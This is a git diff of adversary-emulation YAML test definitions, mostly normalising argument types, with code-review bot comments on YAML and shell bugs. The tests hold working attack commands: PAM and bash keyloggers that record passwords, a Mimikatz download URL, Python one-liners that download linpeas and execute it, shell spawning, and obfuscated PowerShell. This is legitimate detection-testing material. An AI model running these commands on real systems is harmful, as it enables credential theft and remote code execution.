@@ -36,7 +36,7 @@ atomic_tests: Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). - + Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. dependencies: - description: | @@ -48,13 +48,12 @@ atomic_tests: supported_platforms: - linux executor: - command: - if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; - if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; - sudo touch /tmp/password-auth.bk - sudo touch /tmp/system-auth.bk - sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth - sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth + command: if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth + /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo + cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk + sudo touch /tmp/system-auth.bk sudo echo "session required pam_tty_audit.so + enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session required pam_tty_audit.so + enable=* log_password" >> /etc/pam.d/system-auth cleanup_command: | sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth 
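Review bot: The new `command:` in the `@@ -48,13 +48,12` hunk is a multi-line plain scalar, so the parser folds it into one line and the shell receives `sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo "session required ..." >> /etc/pam.d/password-auth ...` as a single `touch` invocation with everything after it as arguments; the two PAM lines are never appended and the test does not exercise what its description claims. The removed text had the same shape (no block indicator), so the defect appears to predate this commit, but the reflow makes it much harder to spot in review. Write `command: |` and keep one shell statement per line, exactly as `cleanup_command: |` already does in the same hunk. Note also that each `>>` redirect is performed by the invoking shell, not by `sudo`, so even with the block scalar fixed the append only succeeds when the executor itself runs elevated.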
@@ -67,25 +66,25 @@ atomic_tests: To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires to be run in a bash shell and that logger and tee are installed. - prereq_command: | - if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi - if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell and that logger and tee are installed. + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true - command: | + command: | PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" tail /var/log/syslog - cleanup_command: | + cleanup_command: | unset PROMPT_COMMAND - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 
@@ -94,54 +93,54 @@ atomic_tests: To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires to be run in a bash shell - prereq_command: | - if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + get_prereq_command: | + echo "" input_arguments: output_file: name: output_file description: File to store captured commands - type: String + type: string default: /tmp/.keyboard.log executor: name: sh - elevation_required: false - command: | + elevation_required: false + command: | trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG echo "Hello World!" cat #{output_file} - cleanup_command: | + cleanup_command: | rm #{output_file} - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: | Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires sshd and auditd - prereq_command: | - if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi - if [ ! 
-x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" input_arguments: user_account: description: Basic ssh user account for testing. - type: String + type: string default: ubuntu executor: name: sh - elevation_required: true - command: | + elevation_required: true + command: | cp -v /etc/pam.d/sshd /tmp/ echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd systemctl restart sshd 
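Review bot: In the `@@ -94,54` hunk the `Bash session based keylogger` executor is `name: sh`, but its command depends on bash-only features (`trap ... DEBUG`, `$BASH_COMMAND`), and the prerequisite only inspects `$SHELL`, which is the user's login shell rather than the interpreter the harness launches; a POSIX `sh` such as dash does not implement the DEBUG trap, so `#{output_file}` stays empty and the test produces nothing for a detection to catch. The `@@ -67,25` hunk above has the same mismatch for `PROMPT_COMMAND`. Setting `name: bash` on both executors (the commit already uses `dependency_executor_name: bash` for the macOS test in this file) or testing `$BASH_VERSION` in `prereq_command` would make the check agree with what actually runs. These lines were only re-indented here, so the problem predates the commit.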
@@ -152,30 +151,30 @@ atomic_tests: whoami exit exit - cleanup_command: | + cleanup_command: | cp -fv /tmp/sshd /etc/pam.d/ - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: | The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires sshd and auditd - prereq_command: | - if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh - elevation_required: true - command: | + elevation_required: true + command: | auditctl -a always,exit -F arch=b64 -S execve -k CMDS auditctl -a always,exit -F arch=b32 -S execve -k CMDS whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") - cleanup_command: | + cleanup_command: | systemctl restart auditd - name: MacOS Swift Keylogger auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 
@@ -184,20 +183,20 @@ atomic_tests: Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 supported_platforms: - - macos + - macos input_arguments: swift_src: - description: Location of swift script - type: Path - default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + description: Location of swift script + type: path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift dependency_executor_name: bash dependencies: - - description: | - swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. - prereq_command: | - if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi - get_prereq_command: | - echo "" + - description: | + swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. + prereq_command: | + if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi + get_prereq_command: | + echo "" executor: command: | swift #{swift_src} -keylog diff --git a/atomics/T1056.004/T1056.004.yaml b/atomics/T1056.004/T1056.004.yaml index f94bb743..f72c49cd 100644 --- a/atomics/T1056.004/T1056.004.yaml +++ b/atomics/T1056.004/T1056.004.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: file_name: description: Dll To Inject - type: Path + type: path default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll server_name: description: TLS Server To Test Get Request - type: Url + type: url default: https://www.example.com dependency_executor_name: powershell dependencies: diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index e3939596..c41b088a 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml @@ -69,4 +69,4 @@ atomic_tests: executor: command: | wmic process get /format:list - name: command_prompt \ No newline at end of file + name: command_prompt 
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 9b52b7bc..289d982d 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: mimurl: description: Mimikatz url - type: Url + type: url default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 executor: command: | @@ -28,7 +28,7 @@ atomic_tests: input_arguments: file_path: description: File path for SharpHound payload - type: String + type: string default: PathToAtomicsFolder\T1059.001\src dependency_executor_name: powershell dependencies: @@ -110,7 +110,7 @@ atomic_tests: input_arguments: url: description: url of payload to execute - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1 executor: command: | @@ -127,7 +127,7 @@ atomic_tests: input_arguments: url: description: url of payload to execute - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml executor: command: | @@ -144,7 +144,7 @@ atomic_tests: input_arguments: url: description: url of payload to execute - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct executor: command: | @@ -206,7 +206,7 @@ atomic_tests: input_arguments: ads_file: description: File created to store Alternate Stream Data - type: String + type: string default: $env:TEMP\NTFS_ADS.txt dependencies: - description: | 
@@ -229,19 +229,19 @@ atomic_tests: description: | Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. - + supported_platforms: - - windows + - windows input_arguments: hostname_to_connect: description: The host to connect to, by default it will connect to the local machine - type: String + type: string default: $env:COMPUTERNAME dependencies: - description: | - PSRemoting must be enabled + PSRemoting must be enabled prereq_command: | Try { New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null @@ -271,11 +271,11 @@ atomic_tests: input_arguments: command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen command_param_variation: description: The "Command" parameter variation to use - type: String + type: string default: C dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -297,15 +297,15 @@ atomic_tests: input_arguments: command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen command_param_variation: description: The "Command" parameter variation to use - type: String + type: string default: C encoded_arguments_param_variation: description: The "EncodedArguments" parameter variation to use - type: String + type: string default: EA dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. 
@@ -327,11 +327,11 @@ atomic_tests: input_arguments: command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen encoded_command_param_variation: description: The "EncodedCommand" parameter variation to use - type: String + type: string default: E dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -353,15 +353,15 @@ atomic_tests: input_arguments: encoded_command_param_variation: description: The "EncodedCommand" parameter variation to use - type: String + type: string default: E command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen encoded_arguments_param_variation: description: The "EncodedArguments" parameter variation to use - type: String + type: string default: EncodedArguments dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -384,7 +384,7 @@ atomic_tests: input_arguments: obfuscated_code: description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' - type: String + type: string default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== executor: command: | 
@@ -398,8 +398,8 @@ atomic_tests: - windows input_arguments: Malicious_cmdlets: - description: Known Malicious Cmdlets - type: String + description: Known Malicious Cmdlets + type: string default: | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" executor: @@ -440,4 +440,3 @@ atomic_tests: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell - diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 6f77e098..d49f7394 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: command_to_execute: description: Command to execute within script. - type: String + type: string default: dir script_path: description: Script path. - type: Path + type: path default: $env:TEMP\T1059.003_script.bat dependency_executor_name: powershell dependencies: 
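Review bot: In the `@@ -398,8` hunk the input-argument key `Malicious_cmdlets` keeps its capital letter while every other argument this commit touches is lower snake_case; since the commit is a case-normalisation pass, this is the moment to rename it to `malicious_cmdlets`, and any `#{Malicious_cmdlets}` reference in the executor (outside this hunk) would have to change with it. Separately, `default: |` leaves a trailing newline on the substituted value; `default: |-` gives the same text without it, which is what a comma-separated list literal presumably wants.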
@@ -40,11 +40,11 @@ atomic_tests: input_arguments: file_contents_path: description: Path to the file that the command prompt will drop. - type: Path + type: path default: '%TEMP%\test.bin' message: description: Message that will be written to disk and then displayed. - type: String + type: string default: 'Hello from the Windows Command Prompt!' executor: command: | @@ -61,11 +61,11 @@ atomic_tests: input_arguments: output_file: description: File to output to - type: String + type: string default: hello.txt input_message: description: Message to write to file - type: String + type: string default: Hello, from CMD! executor: command: | @@ -82,11 +82,11 @@ atomic_tests: input_arguments: file_to_print: description: File to be opened/printed by Wordpad. - type: String + type: string default: $env:temp\T1059_003note.txt max_to_print: description: The maximum number of Wordpad windows the test will open/print. - type: String + type: string default: 75 dependency_executor_name: powershell dependencies: @@ -113,7 +113,7 @@ atomic_tests: input_arguments: input_file: description: CMD file that is read by Command Prompt and execute, which launches calc.exe - type: Path + type: path default: PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd dependency_executor_name: powershell dependencies: @@ -128,4 +128,4 @@ atomic_tests: command: | cmd /r cmd<#{input_file} name: command_prompt - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index dbd5bae4..d567ca1d 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: script_path: description: Script path - type: Path + type: path default: /tmp/art.sh executor: command: | 
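Review bot: In the T1059.003 `@@ -82,11` hunk, `max_to_print` is described as "The maximum number of Wordpad windows the test will open/print" and defaults to `75`, yet it is normalised to `type: string`; `integer` is already part of the vocabulary this commit uses (`process_id` in T1055.001), so `type: integer` here would let a validator reject a non-numeric override instead of passing it through to the loop. If the type is deliberately kept as `string`, quote the default (`default: '75'`) so a YAML dumper does not re-type it as a number on the next round trip.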
@@ -43,15 +43,15 @@ atomic_tests: description: | AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. supported_platforms: - - linux + - linux input_arguments: autosuid: description: Path to the autosuid shell script - type: Path + type: path default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh autosuid_url: description: Path to download autosuid shell script - type: Url + type: url default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh dependency_executor_name: bash dependencies: @@ -73,15 +73,15 @@ atomic_tests: description: | LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host. supported_platforms: - - linux + - linux input_arguments: linenum: description: Path to the LinEnum shell script - type: Path + type: path default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh linenum_url: description: Path to download LinEnum shell script - type: Url + type: url default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh dependency_executor_name: bash dependencies: diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index 283e87dd..5073a174 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml 
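Review bot: In the T1059.004 `@@ -43,15` and `@@ -73,15` hunks, `autosuid_url` and `linenum_url` are typed `url` but still described as `Path to download autosuid shell script`; since the commit is separating `path` from `url`, the descriptions should follow, e.g. `description: URL from which the AutoSUID shell script is downloaded` and the equivalent for LinEnum. Separately, `autosuid_url` defaults to the repository's `main` branch whereas `linenum_url` is pinned to a commit; pinning AutoSUID the same way keeps the test reproducible and makes the content that the prerequisite fetches auditable.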
@@ -5,14 +5,14 @@ atomic_tests: auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 description: |- Visual Basic execution test, execute vbscript via PowerShell. - + When successful, system information will be written to $env:TEMP\T1059.005.out.txt. supported_platforms: - windows input_arguments: vbscript: description: Path to sample script - type: String + type: string default: PathToAtomicsFolder\T1059.005\src\sys_info.vbs dependency_executor_name: powershell dependencies: @@ -70,7 +70,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index cc67c697..5a087865 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml 
@@ -1,172 +1,172 @@ attack_technique: T1059.006 display_name: 'Command and Scripting Interpreter: Python' -atomic_tests: - - name: Execute shell script via python's command mode arguement - auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb - description: Download and execute shell script and write to file then execute locally using Python -c (command mode) - supported_platforms: - - linux - input_arguments: - script_url: - description: Shell script public URL - type: String - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Name of shell script downloaded from the script_url - type: String - default: T1059.006-payload - executor: - description: Linux shell - type: String - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. - type: String - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - dependency_executor_name: sh - dependencies: - - description: Verify if python is in the environment variable path and attempt to import requests library. - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? 
- get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' - name: sh - cleanup_command: | - rm #{payload_file_name} - - name: 'Execute Python via scripts (Linux)' - auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 - description: Create Python file (.py) that downloads and executes shell script via executor arguments - supported_platforms: - - linux - input_arguments: - python_script_name: - description: Python script name - type: Path - default: T1059.006.py - script_url: - description: Shell script public URL - type: String - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Shell script file name downloaded from the script_url - type: String - default: T1059.006-payload - executor: - description: Payload or script interpreter / executor - type: String - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files - type: String - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - dependency_executor_name: sh - dependencies: - - description: | - Requires Python - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? 
- get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - echo 'import requests' > #{python_script_name} - echo 'import os' >> #{python_script_name} - echo 'url = "#{script_url}"' >> #{python_script_name} - echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} - echo 'session = requests.session()' >> #{python_script_name} - echo 'source = session.get(url).content' >> #{python_script_name} - echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} - echo 'fd.write(source)' >> #{python_script_name} - echo 'fd.close()' >> #{python_script_name} - echo 'os.system(malicious_command)' >> #{python_script_name} - $which_python #{python_script_name} - name: sh - cleanup_command: | - rm #{python_script_name} #{payload_file_name} - - name: 'Execute Python via Python executables (Linux)' - auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa - description: | - Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments - supported_platforms: - - linux - input_arguments: - python_script_name: - description: Name of Python script name - type: Path - default: T1059.006.py - script_url: - description: URL hosting external malicious payload - type: String - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Shell script file name downloaded from the script_url - type: String - default: T1059.006-payload - executor: - description: Payload or script interpreter / executor - type: String - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files - type: String - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - 
python_binary_name: - description: Name of Python file to be compiled - type: Path - default: T1059.006.pyc - dependency_executor_name: sh - dependencies: - - description: | - Requires Python - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - echo 'import requests' > #{python_script_name} - echo 'import os' >> #{python_script_name} - echo 'url = "#{script_url}"' >> #{python_script_name} - echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} - echo 'session = requests.session()' >> #{python_script_name} - echo 'source = session.get(url).content' >> #{python_script_name} - echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} - echo 'fd.write(source)' >> #{python_script_name} - echo 'fd.close()' >> #{python_script_name} - echo 'os.system(malicious_command)' >> #{python_script_name} - $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")' - $which_python #{python_binary_name} - name: sh - cleanup_command: | - rm #{python_binary_name} #{python_script_name} #{payload_file_name} - - name: 'Python pty module and spawn function used to spawn sh or bash' - auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792 - description: | - Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence - supported_platforms: - - linux - dependencies: - - description: | - Verify if python is in the environment variable path and attempt to import requests library. 
- prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests +atomic_tests: +- name: Execute shell script via python's command mode arguement + auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + description: Download and execute shell script and write to file then execute locally using Python -c (command mode) + supported_platforms: + - linux + input_arguments: + script_url: + description: Shell script public URL + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Name of shell script downloaded from the script_url + type: string + default: T1059.006-payload executor: - command: |- - which_python=$(which python || which python3 || which python2) - $which_python -c "import pty;pty.spawn('/bin/sh')" - exit - $which_python -c "import pty;pty.spawn('/bin/bash')" - exit - name: bash + description: Linux shell + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + dependency_executor_name: sh + dependencies: + - description: Verify if python is in the environment variable path and attempt to import requests library. + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? 
+ get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' + name: sh + cleanup_command: | + rm #{payload_file_name} +- name: 'Execute Python via scripts (Linux)' + auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + description: Create Python file (.py) that downloads and executes shell script via executor arguments + supported_platforms: + - linux + input_arguments: + python_script_name: + description: Python script name + type: path + default: T1059.006.py + script_url: + description: Shell script public URL + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Shell script file name downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Payload or script interpreter / executor + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + dependency_executor_name: sh + dependencies: + - description: | + Requires Python + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? 
+ get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + echo 'import requests' > #{python_script_name} + echo 'import os' >> #{python_script_name} + echo 'url = "#{script_url}"' >> #{python_script_name} + echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} + echo 'session = requests.session()' >> #{python_script_name} + echo 'source = session.get(url).content' >> #{python_script_name} + echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} + echo 'fd.write(source)' >> #{python_script_name} + echo 'fd.close()' >> #{python_script_name} + echo 'os.system(malicious_command)' >> #{python_script_name} + $which_python #{python_script_name} + name: sh + cleanup_command: | + rm #{python_script_name} #{payload_file_name} +- name: 'Execute Python via Python executables (Linux)' + auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + description: | + Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments + supported_platforms: + - linux + input_arguments: + python_script_name: + description: Name of Python script name + type: path + default: T1059.006.py + script_url: + description: URL hosting external malicious payload + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Shell script file name downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Payload or script interpreter / executor + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + 
